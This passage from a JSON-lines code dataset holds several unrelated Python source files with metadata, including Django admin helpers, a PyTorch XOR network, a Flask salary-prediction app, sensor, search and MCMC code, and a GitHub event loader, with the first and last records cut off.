test_cl = StructByName['test_struct']\r\n t = test_cl()\r\n data = Unknown.Dump(t.Create(123, 456))\r\n print(hex(int.from_bytes(data, 'big'))[2:].upper())\r\n x, ln = Unknown.Parse(data)\r\n print(x)\r\n \r\n","sub_path":"src/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":5442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"515337585","text":"import inspect\nimport sys\n\nimport django.db.models.fields.related_descriptors as related_descriptors\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.db.models.query_utils import DeferredAttribute\n\nfrom common.admin import CustomForm, CustomAdmin\n\n\ndef create_class(_name: str, _superclasses: tuple, _attributes: dict):\n _class = settings.CLASS_CACHE.get(_name)\n if _class is None:\n _class = type(_name, _superclasses, _attributes)\n settings.CLASS_CACHE[_name] = _class\n return _class\n\n\ndef get_cached_class(_name: str):\n return settings.CLASS_CACHE.get(_name)\n\n\ndef get_classes(_name):\n return [obj for name, obj in inspect.getmembers(sys.modules[_name], inspect.isclass)\n if obj.__module__ is _name]\n\n\ndef get_model_fields(_model):\n return tuple(field_name for field_name, _type in _model.__dict__.items() if\n type(_type) == DeferredAttribute and 'id' not in field_name)\n\n\nRELATED_FIELD_CLASS = get_classes(related_descriptors.__name__)\nRELATED_FIELD_MAX_RECURSION = 10\n\n\ndef lookup_related_field(model, model_name, related_fields, recursion_depth=0):\n recursion_depth += 1\n if recursion_depth > RELATED_FIELD_MAX_RECURSION:\n return\n for field_name, _type in model.__dict__.items():\n if type(_type) in RELATED_FIELD_CLASS:\n if '_set' not in field_name:\n field = model._meta.get_field(field_name)\n related_field_name = f\"{model_name}__{field_name}\"\n related_fields.add(related_field_name)\n related_model = field.related_model\n lookup_related_field(related_model, related_field_name, related_fields, recursion_depth)\n\n\ndef lookup_model_classes(name, model_classes):\n if model_classes is None:\n return None\n for model in model_classes:\n if model.__name__ == name:\n return model\n return None\n\n\ndef register_model_admin(model, model_classes=None, optimize_select_related=True):\n search_fields = []\n list_fields = []\n related_fields = set()\n\n for field_name, _type in model.__dict__.items():\n if type(_type) == DeferredAttribute:\n if 'id' not in field_name: search_fields.append(field_name)\n if optimize_select_related:\n if type(_type) in RELATED_FIELD_CLASS:\n if '_set' not in field_name:\n list_fields.append(field_name)\n field = model._meta.get_field(field_name)\n related_fields.add(field_name)\n related_model = field.related_model\n lookup_related_field(related_model, field_name, related_fields)\n\n _forms = CustomForm if optimize_select_related else forms.ModelForm\n display_fields = search_fields + list_fields\n model_admin_attributes = {'list_display': display_fields,\n 'list_filter': list_fields,\n 'list_select_related': tuple(related_fields),\n 'search_fields': search_fields,\n 'form': _forms,\n 'optimize_select_related': optimize_select_related\n }\n if optimize_select_related:\n model_admin_attributes['related_fields'] = related_fields\n\n try:\n inline_models = getattr(model, 'inlines')\n inlines = []\n for model_name in inline_models:\n inline_model = lookup_model_classes(model_name, model_classes)\n if inline_model:\n inline = 
create_class(f\"{inline_model.__name__}Inline\", (admin.TabularInline,),\n {'model': inline_model, 'forms': _forms})\n inlines.append(inline)\n model_admin_attributes['inlines'] = inlines\n except Exception:\n pass\n\n model_admin = type(f\"{model.__name__}Admin\", (CustomAdmin,), model_admin_attributes)\n admin.site.register(model, model_admin)\n","sub_path":"src/common/reflections.py","file_name":"reflections.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"455095600","text":"import torch\r\nimport torch.nn as nn\r\n\r\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\r\nif device == 'cuda':\r\n torch.cuda.manual_seed_all(777)\r\n\r\nX = torch.FloatTensor([[0, 0],[0, 1], [1, 0] , [1 ,1]]).to(device)\r\nY = torch.FloatTensor([[0], [1], [1], [0]]).to(device)\r\n# Similar to the single-layer version, but the model is built differently.\r\nmodel = nn.Sequential(\r\n nn.Linear(2,8,bias=True),\r\n nn.Sigmoid(),\r\n nn.Linear(8, 8, bias=True),\r\n\r\n nn.Sigmoid(),\r\n nn.Linear(8 ,8 ,bias=True),\r\n\r\n nn.Sigmoid(),\r\n nn.Linear(8, 1, bias=True),\r\n nn.Sigmoid()).to(device)\r\n# A model with 2 inputs and hidden layers of 8 units, followed by 1 output layer\r\n\r\ncriterion = torch.nn.BCELoss().to(device)\r\noptimizer = torch.optim.SGD(model.parameters(), lr=1)\r\n# Similar to the single-layer version\r\ntries = 10000\r\nfor i in range(tries + 1):\r\n optimizer.zero_grad()\r\n hypothesis = model(X)\r\n\r\n cost = criterion(hypothesis, Y)\r\n cost.backward()\r\n optimizer.step()\r\n\r\n if i % 100 == 0:\r\n print(i, cost.item())\r\n\r\nwith torch.no_grad():\r\n hypothesis = model(X)\r\n predicted = (hypothesis > 0.5).float()\r\n accuracy = (predicted == Y).float().mean()\r\n print('Model output (Hypothesis): ', hypothesis.detach().cpu().numpy())\r\n print('Model prediction (Predicted): ', predicted.detach().cpu().numpy())\r\n print('Actual values (Y): ', Y.cpu().numpy())\r\n print('Accuracy: ', accuracy.item())","sub_path":"Perceptron/XorGate with morepereptron.py","file_name":"XorGate with morepereptron.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"408320068","text":"#!/usr/bin/python3\nimport json\n\"\"\"\nload_from_json module\n\"\"\"\n\n\ndef load_from_json_file(filename):\n \"\"\"\n Function that creates an object\n from a JSON file\n \"\"\"\n with open(filename) as f:\n nobj = json.load(f)\n return nobj\n","sub_path":"0x0B-python-input_output/8-load_from_json_file.py","file_name":"8-load_from_json_file.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"424239887","text":"from flask import Flask, render_template, request, url_for\nfrom bokeh.resources import INLINE\nfrom bokeh.util.string import encode_utf8\nimport pickle\nfrom os import path, getcwd\nfrom collections import defaultdict\nfrom sklearn.preprocessing import LabelEncoder\nimport pandas as pd\nimport xgboost as xgb\nimport numpy as np\n\napp = Flask(__name__)\n\n# Directories:\nMODELDIR = path.join(getcwd(), 'models')\n\n# Load lists of job titles, locations, and employers to populate the app's dropdown menus and make predictions:\nwith open(path.join(MODELDIR, 'locations-list.txt'), 'r') as f:\n locations = f.readlines()\n\nwith open(path.join(MODELDIR, 'job-titles-list.txt'), 'r') as f:\n job_titles = f.readlines()\n\nwith open(path.join(MODELDIR, 'employers-list.txt'), 'r') as f:\n employers = f.readlines()\n\n# TODO: change to Revelio's model 
(atm using model from TDI-final presentation)\nwith open(path.join(MODELDIR, 'TDI-XGB_model.pkl'), 'rb') as f:\n model = pickle.load(f)\n\n# These columns will change once I update the model to Revelio's model\nd = defaultdict(LabelEncoder)\ncols_transf = ['employer', 'job title', 'state', 'city']\n\nfor col in cols_transf:\n d[col] = LabelEncoder()\n d[col].classes_ = np.load(path.join(MODELDIR, '{}.npy'.format(col).replace(' ', '_')))\n\n\ndef encode_future_data(df, cols_to_transf):\n df_transf = df[cols_to_transf]\n df_non_transf = df.drop(cols_to_transf, axis=1)\n\n for k in d.keys():\n print(k)\n\n fit = df_transf.apply(lambda x: d[x.name].transform(x))\n\n df = pd.concat([fit, df_non_transf], axis=1, join='outer')\n return df\n\n\ndef process_request(predict_dict, cols_to_transf, future_data_column_order):\n predict_df = pd.DataFrame.from_dict(predict_dict)\n #predict_df_transf = predict_df[cols_to_transf]\n #predict_df_non_transf = predict_df.drop(cols_to_transf, axis=1)\n\n #for cols in predict_df_transf.columns:\n # predict_df_transf[col] = predict_df_transf[cols].str.upper()\n\n #predict_df = pd.concat([predict_df_transf, predict_df_non_transf], axis=1, join='outer')\n\n predict_df = encode_future_data(predict_df, cols_to_transf)\n\n predict_df = predict_df[future_data_column_order]\n return predict_df\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n\n # Static resources:\n return_str = ''\n js_resources = INLINE.render_js()\n css_resources = INLINE.render_css()\n\n if request.method == 'POST':\n job_title = request.form.get('job_title')\n location = request.form.get('location')\n employer = request.form.get('employer')\n\n city = location.split(',')[0].strip()\n state = location.split(',')[1].strip()\n\n # 'employer', 'job title', 'state', 'city', 'case status'\n\n predict_dict = {'employer': [employer], 'job title': [job_title], 'state': [state], 'city': [city],\n 'submit year': [2018]}\n\n cols_to_transf = ['employer', 'job title', 'state', 'city']\n future_data_column_order = ['employer', 'job title', 'state', 'city', 'submit year']\n\n predict_df = process_request(predict_dict, cols_to_transf, future_data_column_order)\n d_new_data = xgb.DMatrix(predict_df)\n new_predictions = model.predict(d_new_data)\n return_str = 'Your predicted salary as {} at {} in {}, {} is ${:,.0f}'.format(job_title, employer, city, state,\n int(np.expm1(new_predictions)))\n\n # Render results if available:\n html = render_template('index.html',\n js_resources=js_resources,\n css_resources=css_resources,\n return_str=return_str,\n companies=employers,\n locations=locations,\n job_titles=job_titles,\n )\n\n return encode_utf8(html)\n\n\nif __name__ == '__main__':\n app.run(debug=True, use_debugger=True, use_reloader=True, passthrough_errors=False, port=33507)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"125841333","text":"from slackbot.bot import respond_to, listen_to\n\n\n@respond_to(r'^usage\\s*$')\n@listen_to(r'^usage\\s*$')\ndef usage(message):\n msg = \"Here is how to use me!!\\n\" \\\n \"*Command list*\\n\" \\\n \">List tasks: *task*\\n\" \\\n \">Open a task: *open [task_title]/[overview]/[task_level]/[date]*\\n\" \\\n \">Close a task: *close [task_title]*\\n\" \\\n \"*Option details*\\n\" \\\n \">[task_title] - the title of the task\\n\" \\\n \">[overview] - a description of the task\\n\" \\\n \">[task_level] - one of low, normal, or high\\n\" \\\n \">[date] - mm:dd:yyyy-mm:dd:yyyy\\n\" \\\n \"*Example* (opening a task)\\n\" \\\n \">open test/This is a test task/high/04:01:2017-04:10:2017\"\n message.reply(msg)\n","sub_path":"plugins/usage.py","file_name":"usage.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"246201068","text":"from typing import List\nclass Solution:\n def reversePairs(self, nums: List[int]) -> int:\n def mergesort(a, l, r):\n if r <= l:\n return 0\n mid = (l + r) >> 1\n count = mergesort(a, l, mid) + mergesort(a, mid+1, r)\n j = mid+1\n for i in range(l, mid+1):\n # while a[i] / 2.0 > a[j]:\n while j <= r and a[i]/2.0 > a[j]:\n j += 1\n count += j - (mid+1)\n a[l:r+1] = sorted(a[l:r+1])\n return count\n return mergesort(nums, 0, len(nums)-1)","sub_path":"Week_08/493_reversePairs.py","file_name":"493_reversePairs.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"611399956","text":"import math\n\nimport numpy as np\nimport pandas as pd\n# from pyfinance.ols import PandasRollingOLS\n\n\nfrom statsmodels.datasets import longley\n\n\nclass IndicatorMixin:\n\n def _check_fillna(self, serie: pd.Series, value: int = 0):\n \"\"\"Check if fillna flag is True.\n\n Args:\n serie(pandas.Series): dataset 'Close' column.\n value(int): value to fill gaps; if -1 fill values using 'backfill' mode.\n\n Returns:\n pandas.Series: New feature generated.\n \"\"\"\n if self._fillna:\n serie_output = serie.copy(deep=False)\n serie_output = serie_output.replace([np.inf, -np.inf], np.nan)\n if isinstance(value, int) and value == -1:\n return serie_output.fillna(method='ffill').fillna(value=-1)\n else:\n return serie_output.fillna(method='ffill').fillna(value)\n else:\n return serie\n\n def _true_range(self, high: pd.Series, low: pd.Series, prev_close: pd.Series):\n tr1 = high - low\n tr2 = (high - prev_close).abs()\n tr3 = (low - prev_close).abs()\n tr = pd.DataFrame(data={'tr1': tr1, 'tr2': tr2, 'tr3': tr3}).max(axis=1)\n return tr\n\n\ndef dropna(df):\n \"\"\"Drop rows with \"NaN\" values\n \"\"\"\n df = df.copy()\n number_cols = df.select_dtypes('number').columns.to_list()\n df[number_cols] = df[number_cols][df[number_cols] < math.exp(709)] # big number\n df[number_cols] = df[number_cols][df[number_cols] != 0.0]\n df = df.dropna()\n return df\n\n\ndef sma(series, periods: int, fillna: bool = False):\n min_periods = 0 if fillna else periods\n return series.rolling(window=periods, min_periods=min_periods).mean()\n\n\ndef ema(series, periods, fillna=False):\n min_periods = 0 if fillna else periods\n return series.ewm(span=periods, min_periods=min_periods, adjust=False).mean()\n\n\ndef get_min_max(x1, x2, f='min'):\n \"\"\"Find min or max value between two lists for each index\n \"\"\"\n x1 = np.array(x1)\n x2 = np.array(x2)\n try:\n if f == 'min':\n return pd.Series(np.amin([x1, x2], axis=0))\n elif f == 'max':\n return pd.Series(np.amax([x1, x2], axis=0))\n else:\n raise ValueError('\"f\" variable value should be \"min\" or \"max\"')\n except Exception as e:\n return e\n\n\ndef pulse_conversion(x1: pd.Series, x2: pd.Series):\n \"\"\"\n returns 1 on the first occurrence of \"true\" signal in Array1\n then returns 0 until Array2 is true even if there are \"true\" signals in Array1\n\n :param x1: Series 1\n :param x2: Series 2\n :return: Pulse array as pd.Series\n \"\"\"\n x1 = np.array(x1)\n x2 = np.array(x2)\n result = np.full_like(x1, 0)\n\n last = False\n counter = 0\n for i, j in np.c_[x1, x2]:\n if i and not 
last:\n result[counter] = True\n last = True\n elif j and last:\n result[counter] = True\n last = False\n else:\n result[counter] = False\n counter = counter + 1\n\n return pd.Series(result)\n\n\n# def linear_regression(y: pd.Series, x: pd.Series = None, window: int = 13, has_const: bool = False,\n# use_const: bool = True, offset: bool = False):\n# \"\"\"\n# Smooths out a data series using the least squares method\n#\n# :param y : Y Series\n# :param x : X Series\n# :param window : int\n# Length of each rolling window\n# :param has_const : bool, default False\n# Specifies whether `x` includes a user-supplied constant (a column\n# vector). If False, it is added at instantiation\n# :param use_const : bool, default True\n# Whether to include an intercept term in the model output. Note the\n# difference between has_const and use_const. The former specifies\n# whether a column vector of 1s is included in the input; the latter\n# specifies whether the model itself should include a constant\n# (intercept) term. Exogenous data that is ~N(0,1) would have a\n# constant equal to zero; specify use_const=False in this situation\n# :param offset: Determines whether to add NaN values during the initial window of calculations\n# :return: Predicted Y values as pd.Series\n# \"\"\"\n# rolling_full = PandasRollingOLS(y=y, x=x, window=window, has_const=has_const, use_const=use_const)\n# rolling = pd.DataFrame(rolling_full.predicted)\n# rolling = rolling.iloc[window::window, :].values\n# rolling = pd.Series(np.concatenate(rolling).ravel(), name='predicted')\n#\n# pad = []\n# if offset:\n# for i in range(window - 1):\n# pad.append(np.nan)\n#\n# pad = pd.DataFrame(pd.Series(pad, name=\"predicted\"))\n# rolling = pd.concat([pad, rolling]).reset_index(drop=True)\n#\n# return rolling_full.predicted\n\n\n","sub_path":"ta/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"442019604","text":"import xlrd\nimport os\nimport logging\nfrom xlutils.copy import copy\n\n\nclass AutoOffice:\n def __init__(self):\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(levelname)s %(message)s', )\n logging.info(\"Now initializing..\")\n self.target_excel_files = []\n self.failed_excel_files = []\n self.target_cols = None\n logging.info(\"Reading serial key words..\")\n with open(\"../csv_autor/serial_key.txt\", \"r\") as fp:\n ret = fp.read()\n\n self.serial_key_list = ret.split(\",\")\n logging.info(\"Reading excel files..\")\n for file in os.listdir(\"../excelFiles\"):\n if file.endswith(\".xls\") or file.endswith(\"xlsx\"):\n self.target_excel_files.append(file)\n logging.info(\"Initialization succeed!\")\n\n def excel_process(self, file) -> bool:\n try:\n data = xlrd.open_workbook(\"./excelFiles/\" + file, formatting_info=True)\n sheet = data.sheets()[0]\n table_rows_nums = sheet.nrows\n table_cols_nums = sheet.ncols\n new_excel = copy(data)\n sheet_writer = new_excel.get_sheet(0)\n sheet_writer.write(0, table_cols_nums + 1, \"产品系列\")\n for col in range(table_cols_nums):\n if sheet.cell(0, col).value == \"宝贝标题\":\n self.target_cols = col\n if self.target_cols is None:\n return False\n for row in range(table_rows_nums):\n for key in self.serial_key_list:\n if key in str(sheet.cell(row, self.target_cols).value):\n sheet_writer.write(row, table_cols_nums + 1, key)\n try:\n new_excel.save(\"./results/{}\".format(file))\n except Exception as e:\n print(e)\n return True\n except Exception as e:\n 
self.failed_excel_files.append(file)\n logging.info(\"{}'s process failed, the error is: {}\".format(file, e))\n return False\n\n def start(self):\n logging.info(\"Begin to process excel files..\")\n for excel in self.target_excel_files:\n logging.info(\"Now processing {}\".format(excel))\n if self.excel_process(excel):\n logging.info(\"{}'s process succeed!\".format(excel))\n logging.info(\"Process finished\")\n if self.failed_excel_files:\n logging.info(\"Failed files are: {}\".format(self.failed_excel_files))\n\n\nif __name__ == '__main__':\n ao = AutoOffice()\n ao.start()\n","sub_path":"autoOffice/excel/mai_xlsx.py","file_name":"mai_xlsx.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"478149898","text":"\ndef wyswietl(table):\n \"\"\" wyświetla cyfry w układzie 3xN \"\"\"\n n = 0\n for x in table:\n assert int(x), \"W tablicy znajdują się elementy nie będące cyframi\"\n if n > 0 and n % 3 == 0:\n print()\n print(f'{x} ', end='')\n n += 1\n print()","sub_path":"pp1/04-Subroutines/zad 1-10/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"446898873","text":"import time,sys\nimport Adafruit_BBIO.GPIO as GPIO\n\nusleep = lambda x: time.sleep(x / 1000000.0)\n\n_TIMEOUT1 = 1000\n_TIMEOUT2 = 10000\n\nclass GroveUltrasonicRanger():\n def __init__(self, pin):\n self.__pin = pin\n\n def _get_distance(self):\n GPIO.cleanup()\n GPIO.setup(self.__pin, GPIO.OUT)\n GPIO.output(self.__pin,GPIO.LOW)\n usleep(2)\n GPIO.output(self.__pin,GPIO.HIGH)\n usleep(5)\n # time.sleep(20 / 1000000.0)\n # GPIO.output(self.__pin,GPIO.LOW)\n # print(\"configured succse!!!\")\n GPIO.setup(self.__pin, GPIO.IN)\n t0 = time.time()\n count = 0\n while count < _TIMEOUT1:\n if GPIO.input(self.__pin):\n # print(\"when breaked the count is\")\n # print(count)\n break\n count += 1\n else : \n print(\"time out\")\n return None\n t1 = time.time()\n count = 0\n while count < _TIMEOUT2:\n if not GPIO.input(self.__pin):\n break\n count += 1\n if count >= _TIMEOUT2:\n return None\n\n t2 = time.time()\n\n dt = int((t1 - t0) * 1000000)\n if dt > 530:\n return None\n\n distance = ((t2 - t1) * 1000000 / 29 / 2) # cm\n\n return distance\n\n def get_distance(self):\n while True:\n dist = self._get_distance()\n if dist:\n return dist\n\n\nGrove = GroveUltrasonicRanger\n\n\ndef main():\n if len(sys.argv) < 2:\n print('Usage:please input A0 A2 or PWM')\n sys.exit(1)\n if sys.argv[1] == 'A2':\n sonar = GroveUltrasonicRanger(\"P2_24\")\n if sys.argv[1] == 'A0':\n sonar = GroveUltrasonicRanger(\"P1_31\")\n if sys.argv[1] == 'PWM':\n sonar = GroveUltrasonicRanger(\"P2_1\")\n print('Detecting distance...')\n while True:\n print('{} cm'.format(sonar.get_distance()))\n time.sleep(1)\n\nif __name__ == '__main__':\n main()\n","sub_path":"grove_ultrasonic_ranger.py","file_name":"grove_ultrasonic_ranger.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"488028724","text":"# from queue import PriorityQueue\n#\n#\n# class Graph:\n# def __init__(self):\n# self.edges = {}\n# self.weights = {}\n# self.visited = []\n# self.end_search = False\n#\n# def neighbors(self, node):\n# return self.edges[node]\n#\n# def get_cost(self, from_node, to_node):\n# return self.weights[(from_node + to_node)]\n#\n# def ucs(self, graph, start, 
goal):\n#\n# self.visited = set()\n# queue = PriorityQueue()\n# queue.put((0, start))\n#\n# while queue and not self.end_search:\n# cost, node = queue.get()\n# print(\"Drive to\", node, end=\"\\n\")\n#\n# if node not in self.visited:\n# print(\"Is this goal node \", goal, \"? Current Node \", node)\n# self.visited.add(node)\n#\n# if node == goal:\n# self.end_search = True\n# print(self.end_search)\n# self.visited.append(node)\n# break\n# for i in graph.neighbors(node):\n# if i not in self.visited:\n# total_cost = cost + graph.get_cost(node, i)\n# queue.put((total_cost, i))\nimport heapq\n\n\nclass Node:\n WEIGHT = 0\n NAME = 1\n\n\nclass UCS:\n\n def __init__(self):\n self.visited = []\n self.end_reached = False\n self.paths = []\n\n def ucs(self, graph, start_node, end_node):\n node = (0, start_node)\n frontier = [node] # Nodes to explore\n explored = set() # Set of explored nodes\n\n paths = [(0, [start_node])]\n\n while True:\n if not frontier:\n return 'Not found' # Work on this\n\n node = frontier.pop(0)\n current_path = paths.pop(0)\n explored.add(node[Node.NAME])\n # print('We drive to:', node[Node.NAME], ' frontier', frontier, ' paths', paths)\n # print('\\nWe drive to:', node[Node.NAME], ' paths', paths)\n print('\\nWe drive to:', node[Node.NAME], ' Path:', current_path)\n\n if node[Node.NAME] == end_node:\n self.visited = explored\n print('Path:', current_path[1])\n return 'Complete.' # Work on this\n\n for child in graph[node[Node.NAME]].items():\n child_weight = float(child[1]['weight']) + node[Node.WEIGHT]\n child_in_frontier = self.isValuePresentInTupleList(frontier, Node.NAME, child[0])\n if child[0] not in explored and child_in_frontier == -1:\n print('\\tWe peer at child node:', child[0], ' Weight:', child_weight)\n heapq.heappush(frontier, (child_weight, child[0]))\n heapq.heappush(paths, (child_weight, current_path[1] + [child[0]]))\n elif child_in_frontier != -1 and frontier[child_in_frontier][Node.WEIGHT] > child_weight:\n # print('Child in frontier', child[0], frontier[child_in_frontier][Node.WEIGHT], child_weight)\n frontier[child_in_frontier] = (child_weight, frontier[child_in_frontier][Node.NAME])\n self.changePathByLastNode(paths, child[0], (child_weight, current_path[1] + [child[0]]))\n\n print('\\n\\tFrontier paths:\\n\\t', paths, '\\n\\t', frontier)\n\n @staticmethod\n def isValuePresentInTupleList(tuple_list, tuple_index, value):\n for i, val in enumerate(tuple_list):\n if val[tuple_index] == value:\n return i\n\n return -1\n\n @staticmethod\n def changePathByLastNode(paths, node_name, new_path):\n for index, path in enumerate(paths):\n if path[1][-1] == node_name:\n paths[index] = new_path\n\n\na_list_of_tuples = [(1, 'a'), (2, 'b'), (3, 'c')]\nb = UCS.isValuePresentInTupleList(a_list_of_tuples, 1, 'd')\nprint(b)\nif b == -1:\n print('Condition is true')\nelse:\n print('Condition is false')\n\npaths = [(10, ['a', 'b']), (11, ['a', 'c']), (12, ['a', 'd'])]\n# UCS.removePathByLastNode(paths, 'c')\nprint(paths)\n","sub_path":"NairobiRoadNetwork/ucs.py","file_name":"ucs.py","file_ext":"py","file_size_in_byte":4027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"355425185","text":"import numpy as np\r\n\r\ndef mcmc_sample(x, nparams=2, nwalkers=100, nRval=100, modelpdf = None, \r\n ipar_active = None, params=[], nsteps=1000000000, Rlim = 1.001):\r\n \"\"\"\r\n MCMC sampler implementing the Goodman & Weare (2010) affine-invariant algorithm\r\n inner loop is vectorized\r\n \r\n run for nsteps or until R_GR=Rlim 
is reached, whichever comes first\r\n \r\n \"\"\"\r\n \r\n try:\r\n import acor\r\n except:\r\n raise Exception(\"acor package is not installed! do: pip install acor\")\r\n \r\n # parameters used to draw random number with the GW10 proposal distribution\r\n ap = 2.0; api = 1.0/ap; asqri=1.0/np.sqrt(ap); afact=(ap-1.0)\r\n\r\n # calculate effective number of parameters if some are specified to be fixed\r\n ia = (ipar_active==1)\r\n npareff = np.size(ipar_active[ia])\r\n print((\"starting sampling with %d active parameters of the total %d parameters\"%(npareff, nparams)))\r\n \r\n # initialize some auxiliary arrays and variables \r\n chain = []; Rval = []; \r\n\r\n naccept = 0; ntry = 0; nchain = 0\r\n mw = np.zeros((nwalkers,npareff)); sw = np.zeros((nwalkers,npareff))\r\n m = np.zeros(npareff); Wgr = np.zeros(npareff); Bgr = np.zeros(npareff); Rgr = np.zeros(npareff)\r\n \r\n mutx = []; taux = []\r\n for i in range(npareff): \r\n mutx.append([]); taux.append([])\r\n Rval.append([])\r\n\r\n gxo = np.zeros((2,nwalkers//2))\r\n gxo[0,:] = modelpdf(x[0,:,:], params); gxo[1,:] = modelpdf(x[1,:,:], params)\r\n converged = False;\r\n while not converged:\r\n # for parallelization (not implemented here but the MPI version is available)\r\n # the walkers are split into two complementary sub-groups (see GW10)\r\n for kd in range(2):\r\n k = abs(kd-1)\r\n # vectorized inner loop of walkers stretch move in the Goodman & Weare sampling algorithm\r\n xchunk = x[k,:,:]\r\n jcompl = np.random.randint(0,nwalkers//2,nwalkers//2)\r\n xcompl = x[kd,jcompl,:]\r\n gxold = gxo[k,:]\r\n zf= np.random.rand(nwalkers//2) # the next few steps implement Goodman & Weare sampling algorithm\r\n zf = zf * afact; zr = (1.0+zf)*(1.0+zf)*api\r\n zrtile = np.transpose(np.tile(zr,(nparams,1))) # duplicate zr for nparams\r\n xtry = xcompl + zrtile*(xchunk-xcompl)\r\n gxtry = modelpdf(xtry, params); gx = gxold \r\n gr = gxtry - gx\r\n iacc = np.where(gr>0.)\r\n xchunk[iacc] = xtry[iacc]\r\n gxold[iacc] = gxtry[iacc]\r\n aprob = (npareff-1)*np.log(zr) + (gxtry - gx)\r\n u = np.random.uniform(0.0,1.0,np.shape(xchunk)[0]) \r\n iprob = np.where(aprob>np.log(u))\r\n xchunk[iprob] = xtry[iprob]\r\n gxold[iprob] = gxtry[iprob]\r\n naccept += len(iprob[0])\r\n\r\n x[k,:,ia] = np.transpose(xchunk[:,ia])\r\n gxo[k,:] = gxold \r\n xdum = x[:,:,ia]\r\n\r\n for i in range(nwalkers//2):\r\n chain.append(np.array(xdum[k,i,:]))\r\n\r\n for i in range(nwalkers//2):\r\n mw[k*nwalkers//2+i,:] += xdum[k,i,:]\r\n sw[k*nwalkers//2+i,:] += xdum[k,i,:]**2\r\n ntry += 1\r\n\r\n nchain += 1\r\n \r\n # compute means for the auto-correlation time estimate\r\n for i in range(npareff):\r\n mutx[i].append(np.sum(xdum[:,:,i])/(nwalkers))\r\n\r\n # compute Gelman-Rubin indicator for all parameters\r\n if ( nchain%nRval == 0):\r\n # calculate Gelman & Rubin convergence indicator\r\n mwc = mw/(nchain-1.0)\r\n swc = sw/(nchain-1.0)-np.power(mwc,2)\r\n\r\n for i in range(npareff):\r\n # within chain variance\r\n Wgr[i] = np.sum(swc[:,i])/nwalkers\r\n # mean of the means over Nwalkers\r\n m[i] = np.sum(mwc[:,i])/nwalkers\r\n # between chain variance\r\n Bgr[i] = nchain*np.sum(np.power(mwc[:,i]-m[i],2))/(nwalkers-1.0)\r\n # Gelman-Rubin R factor\r\n Rgr[i] = (1.0 - 1.0/nchain + Bgr[i]/Wgr[i]/nchain)*(nwalkers+1.0)/nwalkers - (nchain-1.0)/(nchain*nwalkers)\r\n tacorx = acor.acor(np.abs(mutx[i]))[0]; taux[i].append(np.max(tacorx))\r\n Rval[i].append(Rgr[i]-1.0)\r\n\r\n print((\"nchain = %d; tcorr = %.2e\"%(nchain, np.max(tacorx))))\r\n print((\"R_GR = \", Rgr))\r\n if (np.max(np.abs(Rgr-1.0)) < np.abs(Rlim-1.0)) or (nchain >= nsteps): converged = True\r\n \r\n print((\"MCMC sampler generated %d samples using %d walkers\"%(ntry, nwalkers)))\r\n print((\"with step acceptance ratio of %.3f\"%(1.0*naccept/ntry)))\r\n \r\n # record integer auto-correlation time at the final iteration\r\n nthin = int(tacorx)\r\n return chain, Rval, nthin\r\n\r\ndef mcmc_sample_init(nparams=2, nwalkers=100, x0=None, step=None, ipar_active=None):\r\n \"\"\"\r\n distribute initial positions of walkers in an isotropic Gaussian around the initial point\r\n \"\"\"\r\n np.random.seed()\r\n \r\n # in this implementation the walkers are split into 2 subgroups and thus nwalkers must be divisible by 2\r\n if nwalkers%2:\r\n raise ValueError(\"MCMCsample_init: nwalkers must be divisible by 2!\")\r\n \r\n x = np.zeros([2,nwalkers//2,nparams])\r\n\r\n for i in range(nparams):\r\n x[:,:,i] = np.reshape(np.random.normal(x0[i],step[i],nwalkers),(2,nwalkers//2))\r\n ina = (ipar_active==0)\r\n if np.size(ina) > 0:\r\n x[:,:,ina] = x0[ina]\r\n return x\r\n","sub_path":"omega500analysistools/example_notebooks/mcmc.py","file_name":"mcmc.py","file_ext":"py","file_size_in_byte":5557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507111772","text":"import json\nimport os\nimport time\nimport argparse\nimport sqlite3\n\nclass Data:\n    def __init__(self, dict_address: str = None, reload: int = 0):\n        if reload == 1:\n            self.__init(dict_address)\n\n    \n    def __init(self, dict_address: str):\n        #建立一个数据库并建立一个名为HOMEWORK的表\n        connector = sqlite3.connect('Information.db')\n        connector.execute('''CREATE TABLE IF NOT EXISTS HOMEWORK (\n                    actor_login TEXT NOT NULL,\n                    event TEXT NOT NULL,\n                    user_repo TEXT NOT NULL);''') \n        connector.commit()\n        for f in os.listdir(dict_address):\n            if f[-5:] == '.json':\n                with open(dict_address + '\\\\' + f, 'r', encoding = 'utf-8') as f:\n                    for _x in f:\n                        #将键keys转为字符串类型\n                        records = json.loads(_x)\n                        data = (records['actor']['login'], records['type'], records['repo']['name'])\n                        